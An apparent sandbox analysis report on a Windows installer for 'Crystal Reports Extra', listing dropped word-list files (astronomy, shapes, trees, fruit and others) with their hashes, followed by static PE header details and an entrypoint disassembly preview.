                                                          Preview: Astronomy.ALBEDO.ALPHA.ASTEROID.BETA.CLUSTER.COMET.COSMIC.COSMOS.COSMOGONY.COSMOLOGY.DELTA.DUST.DWARF.EARTH.ECLIPSE.ECLIPTIC.FLARE.GALACTIC.GALAXY.GAMMA.GIANT.GALILEAN.HALO.HELIOCENTRIC.INTERSTELLAR.ION.IONIC.IONOSPHERE.JUPITER.LATITUDE.LIMB.MAGNETIC.MAGNETOSPHERE.MARS.MERCURY.MERIDIAN.METEOR.MOON.NEBULA.NEUTRON.NEWTONIAN.NEPTUNE.NOVA.ORBIT.PHOTON.PHOTOSPHERE.PLANET.PLUTO.PULSAR.QUASAR.SATELLITE.SATURN.SIDEREAL.SOLAR.SPACE.STAR.SUN.SUNSPOT.SUPERNOVA.TERRESTRIAL.UNIVERSE.URANUS.VENUS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-G40DB.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):221
                                                          Entropy (8bit):4.211554812201922
                                                          Encrypted:false
                                                          SSDEEP:6:/q6y2qbCDv/5PZUIY3rpUSILFQvp1p7ANOq:/qX2LD5PZUXiF6p1KD
                                                          MD5:DE83D926582A70BEC34BA5EAD0DC5596
                                                          SHA1:82AECF434269C753B4CF61640CFB4E6B946E99F4
                                                          SHA-256:F55A24660BA9612C1D51AF0D87A5FA78FFD14351BCA4119012EABAE8B9055DB1
                                                          SHA-512:D7A671AF029E85CE79E64536D14A580124B3E2791142C22E8184BBF055D821B001EED355892DB989B0BDF560371C8BCFB04FA8238897AEF3533CF168926D9D1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Shapes.BOX.CUBE.OVAL.MOON.SQUARE.CIRCLE.TRIANGLE.RHOMBUS.ROUND.PYRAMID.ELLIPSE.RECTANGLE.PARALLELOGRAM.PRISM.CONE.PARABOLA.HYPERBOLA.POLYGON.TETRAHEDRON.PENTAGON.HEXAGON.OCTAGON.POINT.LINE.PLANE.RAY.ANGLE.VERTEX.SIDE.FACE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-IJOAD.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):112
                                                          Entropy (8bit):4.226830585683443
                                                          Encrypted:false
                                                          SSDEEP:3:ErpqGtrvuq4Bj7oesvok5+WdHJgkr1rvn:GVavt7orvf/h5rv
                                                          MD5:C15CCD7186E2E7C43734D04743E906D6
                                                          SHA1:079DD846EEE93CC9FF2DA505863D4753363CDFF6
                                                          SHA-256:9B16AF270FEE449753CAEFDD989461556178ED6C6F4438684FDC51F417D4309A
                                                          SHA-512:0BB4C0D608A10670930245E58BE6396D71423E3580C0C633E236BC3E4512AAA591CDFA5E9E8143270B2EFE56C9BE26B14FA6A329D654A55483D0AE9A29A5E8A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Trees.ASH.ELM.MAPLE.OAK.PALM.PINE.REDWOOD.CYPRESS.CEDAR.HICKORY.FIR.SPRUCE.POPLAR.MAGNOLIA.BIRCH.SEQUOIA.BANYAN.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-IUHBG.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):120
                                                          Entropy (8bit):4.218834559547659
                                                          Encrypted:false
                                                          SSDEEP:3:zLBFmKLBRWv+yVsKLreoysYjXgaUt8wwpu8xpklsosjyJUm:nKKLWvlr3mpUmF9pklBs+JUm
                                                          MD5:A4ABB7B3436DF111EE40AF6725B18113
                                                          SHA1:9283AD1362ACCCE89E48ABCEDD9628C208B23ABC
                                                          SHA-256:31EA6B1AED3AA363F1332F4265915CE5D5EE738D1D7573834B592B79D18C9838
                                                          SHA-512:A8EEC92A409356DB9FC654481C0FF296E741C5C8F165BB5690CC83AF027C1A5D14A9398EBE81D41637F6F39FB9B34AA8218794D36C1FAEA9D0AA76C93F79AEE3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Oceans and Continents.NORTH AMERICA.SOUTH AMERICA.AFRICA.EUROPE.ASIA.AUSTRALIA.ANTARCTICA.ATLANTIC.PACIFIC.INDIAN.ARCTIC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-J7E1D.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):217
                                                          Entropy (8bit):3.8887876562342147
                                                          Encrypted:false
                                                          SSDEEP:3:gis2yqrlvjzxc6/xg7gO4wPZ7bggQuOgX1k638KHnhzKgEmsZpp7n:YVC1jzxcN7Owh7bg1wl1bnhzKVmMpp7n
                                                          MD5:D9AA0DA39A6B34EE90EA32611A299F13
                                                          SHA1:AB2124F619FCB95F08D5CCB660DB3169055C7D7A
                                                          SHA-256:F87CE850717850FCE7785CE2BFA92D1977DBC13D4FC2718BF11AC85E04DA0E63
                                                          SHA-512:825058F4AB41304CFC2F5BA991C9209C896DC21A4AAF1001723CF4A16EF4E91C4EDF6BE7CF6AD63366CA60AC141665ECEC4EC893C3C488428656EA8258755065
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Numbers.ZERO.ONE.TWO.THREE.FOUR.FIVE.SIX.SEVEN.EIGHT.NINE.TEN.ELEVEN.TWELVE.THIRTEEN.FOURTEEN.FIFTEEN.SIXTEEN.SEVENTEEN.EIGHTEEN.NINETEEN.TWENTY.THIRTY.FORTY.FIFTY.SIXTY.SEVENTY.EIGHTY.NINETY.HUNDRED.THOUSAND.MILLION.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-KRF65.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):140
                                                          Entropy (8bit):4.180613213396753
                                                          Encrypted:false
                                                          SSDEEP:3:LvgqMi1yj0R2k3osqrvDxX5vq4sGx+3k5+pwDkkZ1vUp6ysH:Lvgo1yjkosq7ZM4eg+pw4kHvHf
                                                          MD5:06DE8967661F6D2BB8D9E2C0BC817D8B
                                                          SHA1:7F6A460872A05F4AB3215C8D36F266581CE1CEC5
                                                          SHA-256:78674120D9B926FE8169FA676FB61B4D7D65631439DA51E641BD8181DB6F8A35
                                                          SHA-512:901F209982D5EF9E805BD5C60158CF8ABA7FD22D10851CB1822F65F645871AA36FF2A383C2A52B769A45AF56EB921C111814A89122D2CE2EB73CDBFCCFB40769
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Fruit.APPLE.ORANGE.PEAR.LEMON.LIME.KUMQUAT.GRAPE.BANANA.MELON.SATSUMA.PEACH.GRAPEFRUIT.STRAWBERRY.BLUEBERRY.BLACKBERRY.RASPBERRY.KIWI.MANGO.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-OK2RT.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):144
                                                          Entropy (8bit):4.188809416596911
                                                          Encrypted:false
                                                          SSDEEP:3:IFergnedhsV+xnhvUgSMB3RrkB9G81wT9ryHJEg+vp6vPu+lv:genPzfv5JYNO9WHJEbx6vPPlv
                                                          MD5:70FEBE5A878CD95E91B69AFF631A7681
                                                          SHA1:8D86EB3DAB81588A3E7EC319B3C209C0A702EC9E
                                                          SHA-256:4A6B55D4E6D3CBCDC703FD6AEDDD432E914ABE730B30AD8E54A7C771AFE6F11F
                                                          SHA-512:C94425E9C1622E81C28E884FF9C0FC9733370BFF3427DC8B3888855AF5273FE898F94680E27AA821B04AF218E4921041E86AF24B8B7F9C635FED76E8E30A2207
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Colors.RED.PINK.BLUE.CYAN.LIME.GRAY.TEAL.GOLD.GREEN.BROWN.SILVER.MAROON.ORANGE.VIOLET.YELLOW.PURPLE.BRONZE.INDIGO.MAGENTA.LAVENDER.BLACK.WHITE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\numbers.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):217
                                                          Entropy (8bit):3.8887876562342147
                                                          Encrypted:false
                                                          SSDEEP:3:gis2yqrlvjzxc6/xg7gO4wPZ7bggQuOgX1k638KHnhzKgEmsZpp7n:YVC1jzxcN7Owh7bg1wl1bnhzKVmMpp7n
                                                          MD5:D9AA0DA39A6B34EE90EA32611A299F13
                                                          SHA1:AB2124F619FCB95F08D5CCB660DB3169055C7D7A
                                                          SHA-256:F87CE850717850FCE7785CE2BFA92D1977DBC13D4FC2718BF11AC85E04DA0E63
                                                          SHA-512:825058F4AB41304CFC2F5BA991C9209C896DC21A4AAF1001723CF4A16EF4E91C4EDF6BE7CF6AD63366CA60AC141665ECEC4EC893C3C488428656EA8258755065
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Numbers.ZERO.ONE.TWO.THREE.FOUR.FIVE.SIX.SEVEN.EIGHT.NINE.TEN.ELEVEN.TWELVE.THIRTEEN.FOURTEEN.FIFTEEN.SIXTEEN.SEVENTEEN.EIGHTEEN.NINETEEN.TWENTY.THIRTY.FORTY.FIFTY.SIXTY.SEVENTY.EIGHTY.NINETY.HUNDRED.THOUSAND.MILLION.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\plants.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):380
                                                          Entropy (8bit):4.233468493292691
                                                          Encrypted:false
                                                          SSDEEP:6:YoVGI0/lm6CgwGr4DJW2iXHfZyRmqF+8PsWp0nvpq81vr7oaLCABXUyv7+8vBuNG:d6Qlg/F2iXHiF+8PsuQBP1QQCARUyvh5
                                                          MD5:8C46EC2C88AA5A7BFD6692EE0C28108C
                                                          SHA1:86BB8766833577F9D4F5D5DCE7682ABDB3589FCA
                                                          SHA-256:302FCD53959886124C7581520DD47ECAFA33B68A1EA66FDCFB8894EC9EA2C63B
                                                          SHA-512:D0DB5F6F6D273BE73ECC144B0F91A8F5EF8DE8829118FA32CCECEEB5236E66D13A4A39DBE0003F040F0E953A8B2E9A9CF92562E747D7B0DDB0A0323462F2FF5F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Plants.ABELIA.ALOE.ACACIA.ASPARAGUS.AZALEA.BANANA.BASIL.BEAN.BEGONIA.BERRY.BLUEBERRY.CAMELLIA.CHERRY.COCOS.COFFEE.CORN.CRANESBILL.CROCUS.DAFFODIL.DAHLIA.DAISY.DIANTHUS.DOGWOOD.FICUS.FIG.FUCHSIA.GERANIUM.JASMINE.LILY.LAURUS.MALVA.MARIGOLD.ORCHID.OREGANO.PANSY.PARSLEY.PEAR.PEONY.PETUNIA.PINEAPPLE.POTATO.PUMPKIN.RHUBARB.RICE.ROSE.ROSEMARY.RUSHES.SQUASH.TOMATO.VERBENA.YUCCA.ZINNIA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\shapes.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):221
                                                          Entropy (8bit):4.211554812201922
                                                          Encrypted:false
                                                          SSDEEP:6:/q6y2qbCDv/5PZUIY3rpUSILFQvp1p7ANOq:/qX2LD5PZUXiF6p1KD
                                                          MD5:DE83D926582A70BEC34BA5EAD0DC5596
                                                          SHA1:82AECF434269C753B4CF61640CFB4E6B946E99F4
                                                          SHA-256:F55A24660BA9612C1D51AF0D87A5FA78FFD14351BCA4119012EABAE8B9055DB1
                                                          SHA-512:D7A671AF029E85CE79E64536D14A580124B3E2791142C22E8184BBF055D821B001EED355892DB989B0BDF560371C8BCFB04FA8238897AEF3533CF168926D9D1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Shapes.BOX.CUBE.OVAL.MOON.SQUARE.CIRCLE.TRIANGLE.RHOMBUS.ROUND.PYRAMID.ELLIPSE.RECTANGLE.PARALLELOGRAM.PRISM.CONE.PARABOLA.HYPERBOLA.POLYGON.TETRAHEDRON.PENTAGON.HEXAGON.OCTAGON.POINT.LINE.PLANE.RAY.ANGLE.VERTEX.SIDE.FACE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\trees.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):112
                                                          Entropy (8bit):4.226830585683443
                                                          Encrypted:false
                                                          SSDEEP:3:ErpqGtrvuq4Bj7oesvok5+WdHJgkr1rvn:GVavt7orvf/h5rv
                                                          MD5:C15CCD7186E2E7C43734D04743E906D6
                                                          SHA1:079DD846EEE93CC9FF2DA505863D4753363CDFF6
                                                          SHA-256:9B16AF270FEE449753CAEFDD989461556178ED6C6F4438684FDC51F417D4309A
                                                          SHA-512:0BB4C0D608A10670930245E58BE6396D71423E3580C0C633E236BC3E4512AAA591CDFA5E9E8143270B2EFE56C9BE26B14FA6A329D654A55483D0AE9A29A5E8A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Trees.ASH.ELM.MAPLE.OAK.PALM.PINE.REDWOOD.CYPRESS.CEDAR.HICKORY.FIR.SPRUCE.POPLAR.MAGNOLIA.BIRCH.SEQUOIA.BANYAN.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\words1.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):882
                                                          Entropy (8bit):4.147698276575406
                                                          Encrypted:false
                                                          SSDEEP:24:qOUGKuqd7IUZbKg0UpZKUC5tB2eD0xGriqvjl7aDAksITd+Y:qjuw7IKKVUpS5tB2eDaGuqvVaDAHITdL
                                                          MD5:861CABFDC0A36F9665146B15DE26807C
                                                          SHA1:CC63FE7D78A3B6F3AEDEB43B061B954A0B4267F5
                                                          SHA-256:A3806CAAF1BA12893A9D85C8CF12D2E890145A13A34848FFD0107C2128C7D058
                                                          SHA-512:0985102FCAEA29ACD4754F15029222DFF44B60C189EC740C97464E625BE6788D2B461E1308429E14EB768CA0DEF807FD6A2AC85BBF29DCA2822AEF5E96E84223
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Short Words.MY.ON.AGE.AID.ALL.AND.ANT.ASK.ART.AWE.AXE.BAD.BAG.BAR.BEE.BEG.BET.BID.BIN.BIT.BOO.BOW.BOY.BRO.BUG.BUM.BUS.BUY.BYE.CAM.CAN.CAP.CAR.CAT.CAY.COP.COW.CRY.CUT.DOG.DIG.DIP.DRY.DYE.EAR.EAT.EEL.EEG.ELF.END.EON.ERA.EYE.FAD.FAN.FEW.FIG.FIN.FIT.FIX.FOR.FRY.FUN.FUR.HAD.HAM.HAT.HEN.HER.HIM.HOD.HOG.HOP.HUB.HUN.ILL.INN.LAP.LAY.LEG.MAD.MAN.MAP.MAT.MOM.MOP.MUD.MUG.NAP.NOD.NOW.NUN.NUT.OAK.ODD.OFF.OIL.ONE.OUR.OWL.OWN.PAY.PIG.PAW.PEN.PET.POP.RAT.RAW.RAY.RED.RID.RIM.RIP.ROD.RUN.SAD.SAW.SAY.SEE.SKY.SLY.TAP.TEA.THE.TIN.TIP.TOO.TOP.TOY.TRY.TWO.TYE.VET.WAR.WET.WHO.WHY.WIN.WON.YES.ZIP.ZOO.ABLE.ACHE.ACID.BAIT.BAKE.BAND.BATH.BULL.CAMP.CAPE.CARE.COIN.COST.DARE.DART.DEBT.DOLL.DOOM.DOOR.EASY.EPIC.ETCH.EVIL.EXIT.FACT.FADE.FEED.FILL.FISH.FOIL.FOND.FREE.FUSS.GLAD.GULP.HELP.KEEP.KIND.LAND.LEAD.LINE.MEAN.MIND.MOVE.NEWS.PINE.PLOT.QUIT.SAND.SEEM.SELL.SEND.SIGN.SOON.STAR.TALL.TIME.VIEW.YELL.ZOOM.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\words2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1444
                                                          Entropy (8bit):4.247765748971925
                                                          Encrypted:false
                                                          SSDEEP:24:8g8muteQTW5d+ew52s0UjH/CpIdTrhhI+amefWxNc1xTiF9HKOkdsaHFrQDeqZRO:8g/FQTW574xjH/gIVV6mmuQToKeDtU
                                                          MD5:D34724B8D9935413FE501F71BFC63EED
                                                          SHA1:8BAD3BE97B83A2B5671C42C1912A5ACB57357102
                                                          SHA-256:A2ACA8E9D7E56D37DDBF127C863B40D11C9DB4A7A59347936C8448E2EC87CE13
                                                          SHA-512:C852F5547B6C944E28098EADE430D18C496A80C695D8A4ADF2BA22BE8D8C14F959335B585EFC9EE8A84DEB9F8293432BF52C71A3F98C6DE305A2984D66CDBBC1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Medium Words.ACID.ADULT.AGENT.AHEAD.ALARM.ANGEL.ARMY.BADLY.BASE.BASES.BEAST.BEGIN.BITE.BLACK.BLANK.BLESS.BLUE.BREAK.BUDGET.BULL.BUOY.BURY.CAGE.CELLO.CHAOS.CHEAT.CLEAN.CLEAR.CLOCK.CLOSE.CLOWN.COBRA.CODER.COULD.COURT.CREEP.CREW.CROSS.DANDY.DAWN.DECAY.DECOY.DEMON.DINER.DISC.DISCO.DISK.DIVA.DIVE.DIVER.DONKEY.DREAD.DRIED.DRIER.DRINK.DUCK.DWELL.EAST.EQUAL.ERROR.ESSAY.EXAM.FACT.FAKE.FAKIR.FAMILY.FETCH.FIGHT.FLAME.FLAT.FLOAT.FLOOD.FLOOR.FLUTE.FOOD.FRUIT.FUN.GEESE.GENE.GHOST.GLORY.GLOVE.GLOW.GLUE.GNOME.GOAL.GOAT.GOLD.GOOSE.GRADE.GRASS.GRAVE.GRAY.GRAZE.GREEN.GREET.GRIND.GROW.HALF.HALL.HARD.HAWK.HAZY.HITCH.HOBBY.HONEY.HOOK.HORSE.HOTEL.HUMOR.ICON.IDEAL.IDLE.IDOL.INCOME.INVERT.IRON.IRONY.JACKET.JOKE.JULY.KEEN.KILT.LAWYER.LAZY.LEECH.LICK.LIFE.LIGHT.LIKE.LIVE.LOBBY.LUNCH.LURE.LYNX.MANLY.MAYBE.MEDAL.MERCY.MILK.MILKY.MINOR.MOAT.MODEL.MOOSE.MORE.MOUSE.MOVIE.NAME.NASTY.NOBLE.NORTH.NOVICE.ONLY.OPEN.PAPER.PEARL.PEEL.PEER.PHONE.PIKE.PINK.PLANK.PLANT.POLICE.POST.PUSS.QUELL.QUEST.QUIET.QUOTE.RASH.REACH.READY.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\words3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1799
                                                          Entropy (8bit):4.2349912514036845
                                                          Encrypted:false
                                                          SSDEEP:48:/wI/M3lxB6KAk7Ft58tROSaSmcpioeqfUAE/S:/NqBGkJt58tcdAbeqfUp/S
                                                          MD5:926FA7D82A70961D83C7B9DC051EE7B8
                                                          SHA1:D21672084C88F203F26D1F53E7DC952876CC1D35
                                                          SHA-256:FAFD9879344108A0A5196DF58B643F97AD1B07B2BDEEE54706FDF37022D79F09
                                                          SHA-512:8D97D5077CDA870605EA24639A68AA43E6CDBB1E70538A37D6C1ED68171FAC6E9E0F140B3C75D2AB66AA93CF1440C46E4331D6ADAB4D157EB0BD3CC547D3D4B9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Long Words.ACTOR.ADAPTER.ADVANCE.ADVENT.AGENCY.AGENDA.AHEAD.AIRSHIP.ALARM.ALLIES.ALPHABET.AMATEUR.AMAZED.ANARCHY.ANCHOR.ANGEL.ANTENNA.ANTIQUE.APPRIZE.ASTRAL.ATTITUDE.AUREUS.AVATAR.BALLOON.BATTERY.BECKON.BECOME.BEETLE.BEFORE.BEGINS.BEHALF.BEHAVE.BEHIND.BEHOLD.BEING.BELIEF.BELONG.BESIDE.BETTER.BEYOND.BLESS.BOREDOM.BOUGHT.BUDGET.CANVAS.CAPTAIN.CARCASS.CENTURY.CHAOS.CHAOTIC.CHEAT.CHEMIST.CHIMERA.CHURCH.CLASP.CLOCK.CLONING.COLONEL.COMMON.COMPANY.CONFIRM.COUNCIL.COURT.CREDIT.CROSSED.CURRANT.DECOY.DEDUCE.DEFENSE.DEGREE.DEMON.DESIRE.DESSERT.DEVELOP.DEVOUR.DIMMER.DINGER.DISBAND.DISCORD.DISMAY.DIVORCE.DONKEY.DRAGON.DREAMER.DROID.DROOL.EARLIER.EATING.ECOTYPE.ELEGANT.EMPIRE.ENZYME.EPILOGUE.ERROR.ETHICS.EXPORT.EXPRESS.EXTRACT.FAKIR.FAMILY.FEUDAL.FIANCEE.FLAME.FLOAT.FLOOR.FOOLISH.FOREARM.FOSSIL.FOUGHT.FRIGATE.FRILL.FUN.GABBLE.GALLON.GARAGE.GHOST.GLASS.GLIDING.GRAPHIC.GRAVE.GREAT.GREEN.GRUMBLE.HARMONY.HAUNTED.HIGHER.HIGHWIRE.HUMORIST.HUNGRY.HUNTED.HUNTER.IDEAL.IMMORTAL.IMPLORE.INCOME.INSULT.INVERT.IS
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crystal Reports Extra\Crystal Reports Extra.lnk
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Sep 28 15:31:55 2021, mtime=Tue Sep 28 15:31:56 2021, atime=Tue Sep 28 04:12:46 2021, length=4910592, window=hide
                                                          Category:dropped
                                                          Size (bytes):1089
                                                          Entropy (8bit):4.860523030428847
                                                          Encrypted:false
                                                          SSDEEP:24:8m5IgeI6ooq0/0oR9wAYpuCokcOtlo7bkJm:8mugeI9l0/0o7HYbokF/o7bkJ
                                                          MD5:77E4D575654C3C60F692CAC036FB4C60
                                                          SHA1:A991C99BF1BD6D93C48D924BF87633D6A1CE4DDE
                                                          SHA-256:803BF35255351B672E11B8CEFD92510FAF136BD75894717A7FEFA9A6C1064B07
                                                          SHA-512:48F9C7B159E7226AF0C41D39197124A6B22CE7B1CFB31A75FBDE2F05FBDF03EC51DCE639E80E13F1E03E92BBAA0BE7FC910CA1A5BFBEEB260D7A13D5BFA10FEF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: L..................F.... ...&.Y......(Z.....[&y'.....J.......................:..DG..Yr?.D..U..k0.&...&...........-....DP.....W.Z........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny.<S......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny.<S......Y....................D1,.R.o.a.m.i.n.g.....t.1.....<S....CRYSTA~1..\......<S..<S......"}........................C.r.y.s.t.a.l. .R.e.p.o.r.t.s. .E.x.t.r.a.....r.2...J.<S.) .CRYSTA~1.EXE..V......<S..<S......>}........................C.r.y.s.t.a.l.R.e.p.o.r.t.s...e.x.e.......v...............-.......u............U......C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe..7.....\.....\.....\.....\.....\.C.r.y.s.t.a.l. .R.e.p.o.r.t.s. .E.x.t.r.a.\.C.r.y.s.t.a.l.R.e.p.o.r.t.s...e.x.e.4.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.C.r.y.s.t.a.l. .R.e.p.o.r.t.s. .E.x.t.r.a.`.......X.......302494...........!a..%.H.VZAj...'..M..........-..!a..%.H.VZAj...

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.896187341178987
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 98.04%
                                                          • Inno Setup installer (109748/4) 1.08%
                                                          • InstallShield setup (43055/19) 0.42%
                                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                          File name:br4Cu3BycW.exe
                                                          File size:5124457
                                                          MD5:ec72a93f6279b16006f2196f330166ee
                                                          SHA1:74b4d4a19500d3644a6a4f523ad7d4adcb1ace6f
                                                          SHA256:4340bc1e1ddb5d268a010401be96435063de733a2601d158d13f56da9f20df5d
                                                          SHA512:3c0b595d905e8d6f83b82d769415bc257eaf514832575674179720b8486dccd5df24c0ff9a789498f76c388bfc5048fa56c0569d2342277c159262ca58ecf0ad
                                                          SSDEEP:98304:8SiwHhbbp/qa7irrDRcLAs6EOZ354tnteHOBQNnPcMa:Np/qRv9qAzEPttRmcd
                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                          File Icon

                                                          Icon Hash:5030d06cecec80aa

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4b5eec
                                                          Entrypoint Section:.itext
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x60B88E27 [Thu Jun 3 08:09:11 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:1
                                                          File Version Major:6
                                                          File Version Minor:1
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:1
                                                          Import Hash:5a594319a0d69dbc452e748bcf05892e

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, FFFFFFA4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          xor eax, eax
                                                          mov dword ptr [ebp-3Ch], eax
                                                          mov dword ptr [ebp-40h], eax
                                                          mov dword ptr [ebp-5Ch], eax
                                                          mov dword ptr [ebp-30h], eax
                                                          mov dword ptr [ebp-38h], eax
                                                          mov dword ptr [ebp-34h], eax
                                                          mov dword ptr [ebp-2Ch], eax
                                                          mov dword ptr [ebp-28h], eax
                                                          mov dword ptr [ebp-14h], eax
                                                          mov eax, 004B10F0h
                                                          call 00007F760498B055h
                                                          xor eax, eax
                                                          push ebp
                                                          push 004B65E2h
                                                          push dword ptr fs:[eax]
                                                          mov dword ptr fs:[eax], esp
                                                          xor edx, edx
                                                          push ebp
                                                          push 004B659Eh
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          mov eax, dword ptr [004BE634h]
                                                          call 00007F7604A2D77Fh
                                                          call 00007F7604A2D2D2h
                                                          lea edx, dword ptr [ebp-14h]
                                                          xor eax, eax
                                                          call 00007F76049A0AC8h
                                                          mov edx, dword ptr [ebp-14h]
                                                          mov eax, 004C1D84h
                                                          call 00007F7604985C47h
                                                          push 00000002h
                                                          push 00000000h
                                                          push 00000001h
                                                          mov ecx, dword ptr [004C1D84h]
                                                          mov dl, 01h
                                                          mov eax, dword ptr [004237A4h]
                                                          call 00007F76049A1B2Fh
                                                          mov dword ptr [004C1D88h], eax
                                                          xor edx, edx
                                                          push ebp
                                                          push 004B654Ah
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          call 00007F7604A2D807h
                                                          mov dword ptr [004C1D90h], eax
                                                          mov eax, dword ptr [004C1D90h]
                                                          cmp dword ptr [eax+0Ch], 01h
                                                          jne 00007F7604A33DEAh
                                                          mov eax, dword ptr [004C1D90h]
                                                          mov edx, 00000028h
                                                          call 00007F76049A2424h
                                                          mov edx, dword ptr [004C1D90h]

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xf36.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x10e00.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
